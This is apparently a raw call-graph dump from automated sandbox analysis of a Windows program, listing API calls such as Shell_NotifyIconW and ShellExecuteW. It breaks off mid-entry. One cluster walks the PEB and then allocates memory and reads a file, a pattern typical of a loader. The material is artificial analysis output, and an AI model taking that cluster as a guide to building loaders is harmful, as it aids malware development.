__getptd_noexit 104655->104659 104657 fc2d79 GetLastError 104657->104654 104658->104630 104659->104657 104660->104605 104661->104606 104662->104609 104666 fc9d75 LeaveCriticalSection 104663->104666 104665 fc2c87 104665->104596 104666->104665 104667 15b1133 104670 15b0da8 104667->104670 104669 15b117f 104671 15ae7d8 GetPEB 104670->104671 104680 15b0e47 104671->104680 104673 15b0e78 CreateFileW 104676 15b0e85 104673->104676 104673->104680 104674 15b0ea1 VirtualAlloc 104675 15b0ec2 ReadFile 104674->104675 104674->104676 104675->104676 104679 15b0ee0 VirtualAlloc 104675->104679 104677 15b10a2 104676->104677 104678 15b1094 VirtualFree 104676->104678 104677->104669 104678->104677 104679->104676 104679->104680 104680->104674 104680->104676 104681 15b0fa8 CloseHandle 104680->104681 104682 15b0fb8 VirtualFree 104680->104682 104683 15b1cb8 GetPEB 104680->104683 104681->104680 104682->104680 104684 15b1ce2 104683->104684 104684->104673 104685 fa3633 104686 fa366a 104685->104686 104687 fa3688 104686->104687 104688 fa36e7 104686->104688 104724 fa36e5 104686->104724 104689 fa374b PostQuitMessage 104687->104689 104690 fa3695 104687->104690 104692 fdd0cc 104688->104692 104693 fa36ed 104688->104693 104726 fa36d8 104689->104726 104697 fdd154 104690->104697 104698 fa36a0 104690->104698 104691 fa36ca DefWindowProcW 104691->104726 104734 fb1070 10 API calls Mailbox 104692->104734 104694 fa36f2 104693->104694 104695 fa3715 SetTimer RegisterWindowMessageW 104693->104695 104699 fdd06f 104694->104699 104700 fa36f9 KillTimer 104694->104700 104702 fa373e CreatePopupMenu 104695->104702 104695->104726 104750 1002527 71 API calls _memset 104697->104750 104703 fa36a8 104698->104703 104704 fa3755 104698->104704 104712 fdd0a8 MoveWindow 104699->104712 104713 fdd074 104699->104713 104730 fa443a Shell_NotifyIconW _memset 104700->104730 104701 fdd0f3 104735 fb1093 331 API calls Mailbox 104701->104735 104702->104726 104708 fdd139 104703->104708 104709 fa36b3 104703->104709 104732 fa44a0 64 API calls _memset 104704->104732 104708->104691 104749 ff7c36 59 API calls Mailbox 104708->104749 104715 fdd124 104709->104715 104725 fa36be 104709->104725 104710 fdd166 104710->104691 104710->104726 104712->104726 104716 fdd078 104713->104716 104717 fdd097 SetFocus 104713->104717 104714 fa370c 104731 fa3114 DeleteObject DestroyWindow Mailbox 104714->104731 104748 1002d36 81 API calls _memset 104715->104748 104721 fdd081 104716->104721 104716->104725 104717->104726 104733 fb1070 10 API calls Mailbox 104721->104733 104723 fa3764 104723->104726 104724->104691 104725->104691 104736 fa443a Shell_NotifyIconW _memset 104725->104736 104728 fdd118 104737 fa434a 104728->104737 104730->104714 104731->104726 104732->104723 104733->104726 104734->104701 104735->104725 104736->104728 104738 fa4375 _memset 104737->104738 104751 fa4182 104738->104751 104741 fa43fa 104743 fa4430 Shell_NotifyIconW 104741->104743 104744 fa4414 Shell_NotifyIconW 104741->104744 104745 fa4422 104743->104745 104744->104745 104755 fa407c 104745->104755 104747 fa4429 104747->104724 104748->104723 104749->104724 104750->104710 104752 fa4196 104751->104752 104753 fdd423 104751->104753 104752->104741 104777 1002f94 62 API calls _W_store_winword 104752->104777 104753->104752 104754 fdd42c DestroyIcon 104753->104754 104754->104752 104756 fa4098 104755->104756 104757 fa416f Mailbox 104755->104757 104778 fa7a16 104756->104778 104757->104747 104760 fdd3c8 LoadStringW 104764 fdd3e2 104760->104764 104761 fa40b3 104762 fa7bcc 59 API calls 104761->104762 104763 fa40c8 104762->104763 104763->104764 104765 fa40d9 104763->104765 104766 fa7b2e 59 API calls 104764->104766 104767 fa40e3 104765->104767 104768 fa4174 104765->104768 104771 fdd3ec 104766->104771 104770 fa7b2e 59 API calls 104767->104770 104769 fa8047 59 API calls 104768->104769 104773 fa40ed _memset _wcscpy 104769->104773 104770->104773 104772 fa7cab 59 API calls 104771->104772 104771->104773 104774 fdd40e 104772->104774 104775 fa4155 Shell_NotifyIconW 104773->104775 104776 fa7cab 59 API calls 104774->104776 104775->104757 104776->104773 104777->104741 104779 fc0db6 Mailbox 59 API calls 104778->104779 104780 fa7a3b 104779->104780 104781 fa8029 59 API calls 104780->104781 104782 fa40a6 104781->104782 104782->104760 104782->104761 104783 fc7c56 104784 fc7c62 __initptd 104783->104784 104820 fc9e08 GetStartupInfoW 104784->104820 104786 fc7c67 104822 fc8b7c GetProcessHeap 104786->104822 104788 fc7cbf 104789 fc7cca 104788->104789 104905 fc7da6 58 API calls 3 library calls 104788->104905 104823 fc9ae6 104789->104823 104792 fc7cd0 104793 fc7cdb __RTC_Initialize 104792->104793 104906 fc7da6 58 API calls 3 library calls 104792->104906 104844 fcd5d2 104793->104844 104796 fc7cea 104797 fc7cf6 GetCommandLineW 104796->104797 104907 fc7da6 58 API calls 3 library calls 104796->104907 104863 fd4f23 GetEnvironmentStringsW 104797->104863 104800 fc7cf5 104800->104797 104803 fc7d1b 104873 fd4d58 104803->104873 104804 fc7d10 104804->104803 104908 fc30b5 58 API calls 3 library calls 104804->104908 104807 fc7d21 104808 fc7d2c 104807->104808 104909 fc30b5 58 API calls 3 library calls 104807->104909 104887 fc30ef 104808->104887 104811 fc7d34 104812 fc7d3f __wwincmdln 104811->104812 104910 fc30b5 58 API calls 3 library calls 104811->104910 104893 fa47d0 104812->104893 104815 fc7d53 104816 fc7d62 104815->104816 104911 fc3358 58 API calls _doexit 104815->104911 104912 fc30e0 58 API calls _doexit 104816->104912 104819 fc7d67 __initptd 104821 fc9e1e 104820->104821 104821->104786 104822->104788 104913 fc3187 36 API calls 2 library calls 104823->104913 104825 fc9aeb 104914 fc9d3c InitializeCriticalSectionAndSpinCount __ioinit 104825->104914 104827 fc9af0 104828 fc9af4 104827->104828 104916 fc9d8a TlsAlloc 104827->104916 104915 fc9b5c 61 API calls 2 library calls 104828->104915 104831 fc9b06 104831->104828 104833 fc9b11 104831->104833 104832 fc9af9 104832->104792 104917 fc87d5 104833->104917 104836 fc9b53 104925 fc9b5c 61 API calls 2 library calls 104836->104925 104839 fc9b32 104839->104836 104841 fc9b38 104839->104841 104840 fc9b58 104840->104792 104924 fc9a33 58 API calls 3 library calls 104841->104924 104843 fc9b40 GetCurrentThreadId 104843->104792 104845 fcd5de __initptd 104844->104845 104846 fc9c0b __lock 58 API calls 104845->104846 104847 fcd5e5 104846->104847 104848 fc87d5 __calloc_crt 58 API calls 104847->104848 104849 fcd5f6 104848->104849 104850 fcd661 GetStartupInfoW 104849->104850 104851 fcd601 __initptd @_EH4_CallFilterFunc@8 104849->104851 104857 fcd676 104850->104857 104860 fcd7a5 104850->104860 104851->104796 104852 fcd86d 104939 fcd87d LeaveCriticalSection _doexit 104852->104939 104854 fc87d5 __calloc_crt 58 API calls 104854->104857 104855 fcd7f2 GetStdHandle 104855->104860 104856 fcd805 GetFileType 104856->104860 104857->104854 104859 fcd6c4 104857->104859 104857->104860 104858 fcd6f8 GetFileType 104858->104859 104859->104858 104859->104860 104937 fc9e2b InitializeCriticalSectionAndSpinCount 104859->104937 104860->104852 104860->104855 104860->104856 104938 fc9e2b InitializeCriticalSectionAndSpinCount 104860->104938 104864 fc7d06 104863->104864 104865 fd4f34 104863->104865 104869 fd4b1b GetModuleFileNameW 104864->104869 104940 fc881d 58 API calls 2 library calls 104865->104940 104867 fd4f5a _memmove 104868 fd4f70 FreeEnvironmentStringsW 104867->104868 104868->104864 104870 fd4b4f _wparse_cmdline 104869->104870 104872 fd4b8f _wparse_cmdline 104870->104872 104941 fc881d 58 API calls 2 library calls 104870->104941 104872->104804 104874 fd4d69 104873->104874 104875 fd4d71 __NMSG_WRITE 104873->104875 104874->104807 104876 fc87d5 __calloc_crt 58 API calls 104875->104876 104883 fd4d9a __NMSG_WRITE 104876->104883 104877 fd4df1 104878 fc2d55 _free 58 API calls 104877->104878 104878->104874 104879 fc87d5 __calloc_crt 58 API calls 104879->104883 104880 fd4e16 104881 fc2d55 _free 58 API calls 104880->104881 104881->104874 104883->104874 104883->104877 104883->104879 104883->104880 104884 fd4e2d 104883->104884 104942 fd4607 58 API calls __cftof_l 104883->104942 104943 fc8dc6 IsProcessorFeaturePresent 104884->104943 104886 fd4e39 104886->104807 104889 fc30fb __IsNonwritableInCurrentImage 104887->104889 104966 fca4d1 104889->104966 104890 fc3119 __initterm_e 104891 fc2d40 __cinit 67 API calls 104890->104891 104892 fc3138 _doexit __IsNonwritableInCurrentImage 104890->104892 104891->104892 104892->104811 104894 fa47ea 104893->104894 104895 fa4889 104893->104895 104896 fa4824 IsThemeActive 104894->104896 104895->104815 104969 fc336c 104896->104969 104900 fa4850 104981 fa48fd SystemParametersInfoW SystemParametersInfoW 104900->104981 104902 fa485c 104982 fa3b3a 104902->104982 104904 fa4864 SystemParametersInfoW 104904->104895 104905->104789 104906->104793 104907->104800 104911->104816 104912->104819 104913->104825 104914->104827 104915->104832 104916->104831 104920 fc87dc 104917->104920 104919 fc8817 104919->104836 104923 fc9de6 TlsSetValue 104919->104923 104920->104919 104922 fc87fa 104920->104922 104926 fd51f6 104920->104926 104922->104919 104922->104920 104934 fca132 Sleep 104922->104934 104923->104839 104924->104843 104925->104840 104927 fd5201 104926->104927 104932 fd521c 104926->104932 104928 fd520d 104927->104928 104927->104932 104935 fc8b28 58 API calls __getptd_noexit 104928->104935 104930 fd522c HeapAlloc 104931 fd5212 104930->104931 104930->104932 104931->104920 104932->104930 104932->104931 104936 fc33a1 DecodePointer 104932->104936 104934->104922 104935->104931 104936->104932 104937->104859 104938->104860 104939->104851 104940->104867 104941->104872 104942->104883 104944 fc8dd1 104943->104944 104949 fc8c59 104944->104949 104948 fc8dec 104948->104886 104950 fc8c73 _memset __call_reportfault 104949->104950 104951 fc8c93 IsDebuggerPresent 104950->104951 104957 fca155 SetUnhandledExceptionFilter UnhandledExceptionFilter 104951->104957 104954 fc8d57 __call_reportfault 104958 fcc5f6 104954->104958 104955 fc8d7a 104956 fca140 GetCurrentProcess TerminateProcess 104955->104956 104956->104948 104957->104954 104959 fcc5fe 104958->104959 104960 fcc600 IsProcessorFeaturePresent 104958->104960 104959->104955 104962 fd590a 104960->104962 104965 fd58b9 5 API calls 2 library calls 104962->104965 104964 fd59ed 104964->104955 104965->104964 104967 fca4d4 EncodePointer 104966->104967 104967->104967 104968 fca4ee 104967->104968 104968->104890 104970 fc9c0b __lock 58 API calls 104969->104970 104971 fc3377 DecodePointer EncodePointer 104970->104971 105034 fc9d75 LeaveCriticalSection 104971->105034 104973 fa4849 104974 fc33d4 104973->104974 104975 fc33de 104974->104975 104976 fc33f8 104974->104976 104975->104976 105035 fc8b28 58 API calls __getptd_noexit 104975->105035 104976->104900 104978 fc33e8 105036 fc8db6 9 API calls __cftof_l 104978->105036 104980 fc33f3 104980->104900 104981->104902 104983 fa3b47 __ftell_nolock 104982->104983 104984 fa7667 59 API calls 104983->104984 104985 fa3b51 GetCurrentDirectoryW 104984->104985 105037 fa3766 104985->105037 104987 fa3b7a IsDebuggerPresent 104988 fa3b88 104987->104988 104989 fdd272 MessageBoxA 104987->104989 104990 fa3c61 104988->104990 104992 fdd28c 104988->104992 104993 fa3ba5 104988->104993 104989->104992 104991 fa3c68 SetCurrentDirectoryW 104990->104991 104994 fa3c75 Mailbox 104991->104994 105236 fa7213 59 API calls Mailbox 104992->105236 105118 fa7285 104993->105118 104994->104904 104997 fdd29c 105002 fdd2b2 SetCurrentDirectoryW 104997->105002 104999 fa3bc3 GetFullPathNameW 105000 fa7bcc 59 API calls 104999->105000 105001 fa3bfe 105000->105001 105134 fb092d 105001->105134 105002->104994 105005 fa3c1c 105006 fa3c26 105005->105006 105237 ff874b AllocateAndInitializeSid CheckTokenMembership FreeSid 105005->105237 105150 fa3a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 105006->105150 105009 fdd2cf 105009->105006 105012 fdd2e0 105009->105012 105014 fa4706 61 API calls 105012->105014 105013 fa3c30 105015 fa3c43 105013->105015 105017 fa434a 68 API calls 105013->105017 105016 fdd2e8 105014->105016 105158 fb09d0 105015->105158 105019 fa7de1 59 API calls 105016->105019 105017->105015 105021 fdd2f5 105019->105021 105020 fa3c4e 105020->104990 105235 fa443a Shell_NotifyIconW _memset 105020->105235 105023 fdd2ff 105021->105023 105024 fdd324 105021->105024 105026 fa7cab 59 API calls 105023->105026 105025 fa7cab 59 API calls 105024->105025 105027 fdd320 GetForegroundWindow ShellExecuteW 105025->105027 105028 fdd30a 105026->105028 105032 fdd354 Mailbox 105027->105032 105030 fa7b2e 59 API calls 105028->105030 105031 fdd317 105030->105031 105033 fa7cab 59 API calls 105031->105033 105032->104990 105033->105027 105034->104973 105035->104978 105036->104980 105038 fa7667 59 API calls 105037->105038 105039 fa377c 105038->105039 105238 fa3d31 105039->105238 105041 fa379a 105042 fa4706 61 API calls 105041->105042 105043 fa37ae 105042->105043 105044 fa7de1 59 API calls 105043->105044 105045 fa37bb 105044->105045 105252 fa4ddd 105045->105252 105048 fa37dc Mailbox 105053 fa8047 59 API calls 105048->105053 105049 fdd173 105308 100955b 105049->105308 105052 fdd192 105055 fc2d55 _free 58 API calls 105052->105055 105056 fa37ef 105053->105056 105057 fdd19f 105055->105057 105276 fa928a 105056->105276 105059 fa4e4a 84 API calls 105057->105059 105061 fdd1a8 105059->105061 105065 fa3ed0 59 API calls 105061->105065 105062 fa7de1 59 API calls 105063 fa3808 105062->105063 105279 fa84c0 105063->105279 105067 fdd1c3 105065->105067 105066 fa381a Mailbox 105068 fa7de1 59 API calls 105066->105068 105069 fa3ed0 59 API calls 105067->105069 105070 fa3840 105068->105070 105071 fdd1df 105069->105071 105072 fa84c0 69 API calls 105070->105072 105074 fa4706 61 API calls 105071->105074 105073 fa384f Mailbox 105072->105073 105078 fa7667 59 API calls 105073->105078 105075 fdd204 105074->105075 105076 fa3ed0 59 API calls 105075->105076 105077 fdd210 105076->105077 105079 fa8047 59 API calls 105077->105079 105080 fa386d 105078->105080 105081 fdd21e 105079->105081 105283 fa3ed0 105080->105283 105084 fa3ed0 59 API calls 105081->105084 105085 fdd22d 105084->105085 105091 fa8047 59 API calls 105085->105091 105087 fa3887 105087->105061 105088 fa3891 105087->105088 105089 fc2efd _W_store_winword 60 API calls 105088->105089 105090 fa389c 105089->105090 105090->105067 105092 fa38a6 105090->105092 105093 fdd24f 105091->105093 105094 fc2efd _W_store_winword 60 API calls 105092->105094 105095 fa3ed0 59 API calls 105093->105095 105096 fa38b1 105094->105096 105097 fdd25c 105095->105097 105096->105071 105098 fa38bb 105096->105098 105097->105097 105099 fc2efd _W_store_winword 60 API calls 105098->105099 105100 fa38c6 105099->105100 105100->105085 105101 fa3907 105100->105101 105103 fa3ed0 59 API calls 105100->105103 105101->105085 105102 fa3914 105101->105102 105104 fa92ce 59 API calls 105102->105104 105105 fa38ea 105103->105105 105107 fa3924 105104->105107 105106 fa8047 59 API calls 105105->105106 105108 fa38f8 105106->105108 105109 fa9050 59 API calls 105107->105109 105110 fa3ed0 59 API calls 105108->105110 105111 fa3932 105109->105111 105110->105101 105299 fa8ee0 105111->105299 105113 fa928a 59 API calls 105115 fa394f 105113->105115 105114 fa8ee0 60 API calls 105114->105115 105115->105113 105115->105114 105116 fa3ed0 59 API calls 105115->105116 105117 fa3995 Mailbox 105115->105117 105116->105115 105117->104987 105119 fa7292 __ftell_nolock 105118->105119 105120 fa72ab 105119->105120 105121 fdea22 _memset 105119->105121 105122 fa4750 60 API calls 105120->105122 105123 fdea3e GetOpenFileNameW 105121->105123 105124 fa72b4 105122->105124 105125 fdea8d 105123->105125 105917 fc0791 105124->105917 105127 fa7bcc 59 API calls 105125->105127 105129 fdeaa2 105127->105129 105129->105129 105131 fa72c9 105935 fa686a 105131->105935 105135 fb093a __ftell_nolock 105134->105135 106162 fa6d80 105135->106162 105137 fa3c14 105137->104997 105137->105005 105138 fb093f 105138->105137 106173 fb119e 89 API calls 105138->106173 105140 fb094c 105140->105137 106174 fb3ee7 91 API calls Mailbox 105140->106174 105142 fb0955 105142->105137 105143 fb0959 GetFullPathNameW 105142->105143 105144 fa7bcc 59 API calls 105143->105144 105145 fb0985 105144->105145 105146 fa7bcc 59 API calls 105145->105146 105147 fb0992 105146->105147 105148 fe4cab _wcscat 105147->105148 105149 fa7bcc 59 API calls 105147->105149 105149->105137 105151 fa3ab0 LoadImageW RegisterClassExW 105150->105151 105152 fdd261 105150->105152 106211 fa3041 7 API calls 105151->106211 106212 fa47a0 LoadImageW EnumResourceNamesW 105152->106212 105155 fa3b34 105157 fa39d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 105155->105157 105156 fdd26a 105157->105013 105159 fe4cc3 105158->105159 105171 fb09f5 105158->105171 106269 1009e4a 89 API calls 4 library calls 105159->106269 105161 fb0cfa 105161->105020 105163 fb0ee4 105163->105161 105165 fb0ef1 105163->105165 106267 fb1093 331 API calls Mailbox 105165->106267 105166 fb0a4b PeekMessageW 105223 fb0a05 Mailbox 105166->105223 105169 fb0ef8 LockWindowUpdate DestroyWindow GetMessageW 105169->105161 105173 fb0f2a 105169->105173 105170 fb0ce4 105170->105161 106266 fb1070 10 API calls Mailbox 105170->106266 105171->105223 106270 fa9e5d 60 API calls 105171->106270 106271 ff6349 331 API calls 105171->106271 105172 fe4e81 Sleep 105172->105223 105175 fe5c58 TranslateMessage DispatchMessageW GetMessageW 105173->105175 105175->105175 105176 fe5c88 105175->105176 105176->105161 105177 fa9e5d 60 API calls 105177->105223 105178 fb0e43 PeekMessageW 105178->105223 105179 fb0ea5 TranslateMessage DispatchMessageW 105179->105178 105180 fe4d50 TranslateAcceleratorW 105180->105178 105180->105223 105181 fe581f WaitForSingleObject 105187 fe583c GetExitCodeProcess CloseHandle 105181->105187 105181->105223 105183 fb0d13 timeGetTime 105183->105223 105184 fb0e5f Sleep 105219 fb0e70 Mailbox 105184->105219 105185 fa8047 59 API calls 105185->105223 105186 fa7667 59 API calls 105186->105219 105218 fb0f95 105187->105218 105188 fe5af8 Sleep 105188->105219 105190 fc0db6 59 API calls Mailbox 105190->105223 105191 fab73c 304 API calls 105191->105223 105193 fc049f timeGetTime 105193->105219 105194 fb0f4e timeGetTime 106268 fa9e5d 60 API calls 105194->106268 105197 fe5b8f GetExitCodeProcess 105199 fe5bbb CloseHandle 105197->105199 105200 fe5ba5 WaitForSingleObject 105197->105200 105198 fa9837 84 API calls 105198->105223 105199->105219 105200->105199 105200->105223 105203 1025f25 110 API calls 105203->105219 105204 fab7dd 109 API calls 105204->105219 105205 fe5874 105205->105218 105206 fe5078 Sleep 105206->105223 105207 fe5c17 Sleep 105207->105223 105209 fa7de1 59 API calls 105209->105219 105218->105020 105219->105186 105219->105193 105219->105197 105219->105203 105219->105204 105219->105205 105219->105206 105219->105207 105219->105209 105219->105218 105219->105223 106278 1002408 60 API calls 105219->106278 106279 fa9e5d 60 API calls 105219->106279 106280 fa89b3 69 API calls Mailbox 105219->106280 106281 fab73c 331 API calls 105219->106281 106282 ff64da 60 API calls 105219->106282 106283 1005244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 105219->106283 106284 1003c55 66 API calls Mailbox 105219->106284 105220 1009e4a 89 API calls 105220->105223 105222 fa84c0 69 API calls 105222->105223 105223->105166 105223->105170 105223->105172 105223->105177 105223->105178 105223->105179 105223->105180 105223->105181 105223->105183 105223->105184 105223->105185 105223->105188 105223->105190 105223->105191 105223->105194 105223->105198 105223->105218 105223->105219 105223->105220 105223->105222 105224 fa9c90 59 API calls Mailbox 105223->105224 105225 fa9ea0 304 API calls 105223->105225 105227 fa89b3 69 API calls 105223->105227 105228 ff617e 59 API calls Mailbox 105223->105228 105229 fe55d5 VariantClear 105223->105229 105230 fe566b VariantClear 105223->105230 105231 fa8cd4 59 API calls Mailbox 105223->105231 105232 fe5419 VariantClear 105223->105232 105233 ff6e8f 59 API calls 105223->105233 105234 fa7de1 59 API calls 105223->105234 106213 fae6a0 105223->106213 106244 faf460 105223->106244 106263 fae420 331 API calls 105223->106263 106264 fafce0 331 API calls 2 library calls 105223->106264 106265 fa31ce IsDialogMessageW GetClassLongW 105223->106265 106272 1026018 59 API calls 105223->106272 106273 1009a15 59 API calls Mailbox 105223->106273 106274 ffd4f2 59 API calls 105223->106274 106275 ff60ef 59 API calls 2 library calls 105223->106275 106276 fa8401 59 API calls 105223->106276 106277 fa82df 59 API calls Mailbox 105223->106277 105224->105223 105225->105223 105227->105223 105228->105223 105229->105223 105230->105223 105231->105223 105232->105223 105233->105223 105234->105223 105235->104990 105236->104997 105237->105009 105239 fa3d3e __ftell_nolock 105238->105239 105240 fa3ea4 Mailbox 105239->105240 105241 fa7bcc 59 API calls 105239->105241 105240->105041 105243 fa3d70 105241->105243 105251 fa3da6 Mailbox 105243->105251 105349 fa79f2 105243->105349 105244 fa79f2 59 API calls 105244->105251 105245 fa3e77 105245->105240 105246 fa7de1 59 API calls 105245->105246 105248 fa3e98 105246->105248 105247 fa7de1 59 API calls 105247->105251 105249 fa3f74 59 API calls 105248->105249 105249->105240 105250 fa3f74 59 API calls 105250->105251 105251->105240 105251->105244 105251->105245 105251->105247 105251->105250 105352 fa4bb5 105252->105352 105257 fa4e08 LoadLibraryExW 105362 fa4b6a 105257->105362 105258 fdd8e6 105260 fa4e4a 84 API calls 105258->105260 105262 fdd8ed 105260->105262 105264 fa4b6a 3 API calls 105262->105264 105266 fdd8f5 105264->105266 105265 fa4e2f 105265->105266 105267 fa4e3b 105265->105267 105388 fa4f0b 105266->105388 105269 fa4e4a 84 API calls 105267->105269 105271 fa37d4 105269->105271 105271->105048 105271->105049 105273 fdd91c 105396 fa4ec7 105273->105396 105275 fdd929 105277 fc0db6 Mailbox 59 API calls 105276->105277 105278 fa37fb 105277->105278 105278->105062 105280 fa84cb 105279->105280 105281 fa84f2 105280->105281 105647 fa89b3 69 API calls Mailbox 105280->105647 105281->105066 105284 fa3eda 105283->105284 105285 fa3ef3 105283->105285 105287 fa8047 59 API calls 105284->105287 105286 fa7bcc 59 API calls 105285->105286 105288 fa3879 105286->105288 105287->105288 105289 fc2efd 105288->105289 105290 fc2f7e 105289->105290 105291 fc2f09 105289->105291 105650 fc2f90 60 API calls 3 library calls 105290->105650 105297 fc2f2e 105291->105297 105648 fc8b28 58 API calls __getptd_noexit 105291->105648 105294 fc2f8b 105294->105087 105295 fc2f15 105649 fc8db6 9 API calls __cftof_l 105295->105649 105297->105087 105298 fc2f20 105298->105087 105300 fdf17c 105299->105300 105303 fa8ef7 105299->105303 105300->105303 105652 fa8bdb 59 API calls Mailbox 105300->105652 105302 fa8fff 105302->105115 105303->105302 105304 fa8ff8 105303->105304 105305 fa9040 105303->105305 105307 fc0db6 Mailbox 59 API calls 105304->105307 105651 fa9d3c 60 API calls Mailbox 105305->105651 105307->105302 105309 fa4ee5 85 API calls 105308->105309 105310 10095ca 105309->105310 105653 1009734 105310->105653 105313 fa4f0b 74 API calls 105314 10095f7 105313->105314 105315 fa4f0b 74 API calls 105314->105315 105316 1009607 105315->105316 105317 fa4f0b 74 API calls 105316->105317 105318 1009622 105317->105318 105319 fa4f0b 74 API calls 105318->105319 105320 100963d 105319->105320 105321 fa4ee5 85 API calls 105320->105321 105322 1009654 105321->105322 105323 fc571c __crtGetStringTypeA_stat 58 API calls 105322->105323 105324 100965b 105323->105324 105325 fc571c __crtGetStringTypeA_stat 58 API calls 105324->105325 105326 1009665 105325->105326 105327 fa4f0b 74 API calls 105326->105327 105328 1009679 105327->105328 105329 1009109 GetSystemTimeAsFileTime 105328->105329 105330 100968c 105329->105330 105331 10096a1 105330->105331 105332 10096b6 105330->105332 105333 fc2d55 _free 58 API calls 105331->105333 105334 100971b 105332->105334 105335 10096bc 105332->105335 105337 10096a7 105333->105337 105336 fc2d55 _free 58 API calls 105334->105336 105659 1008b06 116 API calls __fcloseall 105335->105659 105341 fdd186 105336->105341 105339 fc2d55 _free 58 API calls 105337->105339 105339->105341 105340 1009713 105342 fc2d55 _free 58 API calls 105340->105342 105341->105052 105343 fa4e4a 105341->105343 105342->105341 105344 fa4e54 105343->105344 105346 fa4e5b 105343->105346 105660 fc53a6 105344->105660 105347 fa4e6a 105346->105347 105348 fa4e7b FreeLibrary 105346->105348 105347->105052 105348->105347 105350 fa7e4f 59 API calls 105349->105350 105351 fa79fd 105350->105351 105351->105243 105401 fa4c03 105352->105401 105355 fa4c03 2 API calls 105358 fa4bdc 105355->105358 105356 fa4bec FreeLibrary 105357 fa4bf5 105356->105357 105359 fc525b 105357->105359 105358->105356 105358->105357 105405 fc5270 105359->105405 105361 fa4dfc 105361->105257 105361->105258 105565 fa4c36 105362->105565 105364 fa4b8f 105367 fa4baa 105364->105367 105368 fa4ba1 FreeLibrary 105364->105368 105366 fa4c36 2 API calls 105366->105364 105369 fa4c70 105367->105369 105368->105367 105370 fc0db6 Mailbox 59 API calls 105369->105370 105371 fa4c85 105370->105371 105372 fa522e 59 API calls 105371->105372 105373 fa4c91 _memmove 105372->105373 105374 fa4ccc 105373->105374 105375 fa4d89 105373->105375 105376 fa4dc1 105373->105376 105377 fa4ec7 69 API calls 105374->105377 105569 fa4e89 CreateStreamOnHGlobal 105375->105569 105580 100991b 95 API calls 105376->105580 105385 fa4cd5 105377->105385 105380 fa4f0b 74 API calls 105380->105385 105381 fa4d69 105381->105265 105383 fdd8a7 105384 fa4ee5 85 API calls 105383->105384 105386 fdd8bb 105384->105386 105385->105380 105385->105381 105385->105383 105575 fa4ee5 105385->105575 105387 fa4f0b 74 API calls 105386->105387 105387->105381 105389 fdd9cd 105388->105389 105390 fa4f1d 105388->105390 105604 fc55e2 105390->105604 105393 1009109 105624 1008f5f 105393->105624 105395 100911f 105395->105273 105397 fa4ed6 105396->105397 105398 fdd990 105396->105398 105629 fc5c60 105397->105629 105400 fa4ede 105400->105275 105402 fa4bd0 105401->105402 105403 fa4c0c LoadLibraryA 105401->105403 105402->105355 105402->105358 105403->105402 105404 fa4c1d GetProcAddress 105403->105404 105404->105402 105408 fc527c __initptd 105405->105408 105406 fc528f 105454 fc8b28 58 API calls __getptd_noexit 105406->105454 105408->105406 105410 fc52c0 105408->105410 105409 fc5294 105455 fc8db6 9 API calls __cftof_l 105409->105455 105424 fd04e8 105410->105424 105413 fc52c5 105414 fc52ce 105413->105414 105415 fc52db 105413->105415 105456 fc8b28 58 API calls __getptd_noexit 105414->105456 105417 fc5305 105415->105417 105418 fc52e5 105415->105418 105439 fd0607 105417->105439 105457 fc8b28 58 API calls __getptd_noexit 105418->105457 105419 fc529f __initptd @_EH4_CallFilterFunc@8 105419->105361 105425 fd04f4 __initptd 105424->105425 105426 fc9c0b __lock 58 API calls 105425->105426 105437 fd0502 105426->105437 105427 fd057d 105464 fc881d 58 API calls 2 library calls 105427->105464 105428 fd0576 105459 fd05fe 105428->105459 105431 fd0584 105431->105428 105465 fc9e2b InitializeCriticalSectionAndSpinCount 105431->105465 105432 fd05f3 __initptd 105432->105413 105434 fc9c93 __mtinitlocknum 58 API calls 105434->105437 105436 fd05aa EnterCriticalSection 105436->105428 105437->105427 105437->105428 105437->105434 105462 fc6c50 59 API calls __lock 105437->105462 105463 fc6cba LeaveCriticalSection LeaveCriticalSection _doexit 105437->105463 105447 fd0627 __wopenfile 105439->105447 105440 fd0641 105470 fc8b28 58 API calls __getptd_noexit 105440->105470 105442 fd07fc 105442->105440 105446 fd085f 105442->105446 105443 fd0646 105471 fc8db6 9 API calls __cftof_l 105443->105471 105445 fc5310 105458 fc5332 LeaveCriticalSection LeaveCriticalSection __wfsopen 105445->105458 105467 fd85a1 105446->105467 105447->105440 105447->105442 105472 fc37cb 60 API calls 2 library calls 105447->105472 105450 fd07f5 105450->105442 105473 fc37cb 60 API calls 2 library calls 105450->105473 105452 fd0814 105452->105442 105474 fc37cb 60 API calls 2 library calls 105452->105474 105454->105409 105455->105419 105456->105419 105457->105419 105458->105419 105466 fc9d75 LeaveCriticalSection 105459->105466 105461 fd0605 105461->105432 105462->105437 105463->105437 105464->105431 105465->105436 105466->105461 105475 fd7d85 105467->105475 105469 fd85ba 105469->105445 105470->105443 105471->105445 105472->105450 105473->105452 105474->105442 105476 fd7d91 __initptd 105475->105476 105477 fd7da7 105476->105477 105479 fd7ddd 105476->105479 105562 fc8b28 58 API calls __getptd_noexit 105477->105562 105486 fd7e4e 105479->105486 105480 fd7dac 105563 fc8db6 9 API calls __cftof_l 105480->105563 105483 fd7df9 105564 fd7e22 LeaveCriticalSection __unlock_fhandle 105483->105564 105485 fd7db6 __initptd 105485->105469 105487 fd7e6e 105486->105487 105488 fc44ea __wsopen_nolock 58 API calls 105487->105488 105491 fd7e8a 105488->105491 105489 fd7fc1 105490 fc8dc6 __invoke_watson 8 API calls 105489->105490 105492 fd85a0 105490->105492 105491->105489 105493 fd7ec4 105491->105493 105504 fd7ee7 105491->105504 105494 fd7d85 __wsopen_helper 103 API calls 105492->105494 105495 fc8af4 __chsize_nolock 58 API calls 105493->105495 105496 fd85ba 105494->105496 105497 fd7ec9 105495->105497 105496->105483 105498 fc8b28 __cftof_l 58 API calls 105497->105498 105499 fd7ed6 105498->105499 105501 fc8db6 __cftof_l 9 API calls 105499->105501 105500 fd7fa5 105502 fc8af4 __chsize_nolock 58 API calls 105500->105502 105503 fd7ee0 105501->105503 105505 fd7faa 105502->105505 105503->105483 105504->105500 105508 fd7f83 105504->105508 105506 fc8b28 __cftof_l 58 API calls 105505->105506 105507 fd7fb7 105506->105507 105509 fc8db6 __cftof_l 9 API calls 105507->105509 105510 fcd294 __alloc_osfhnd 61 API calls 105508->105510 105509->105489 105511 fd8051 105510->105511 105512 fd807e 105511->105512 105513 fd805b 105511->105513 105515 fd7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105512->105515 105514 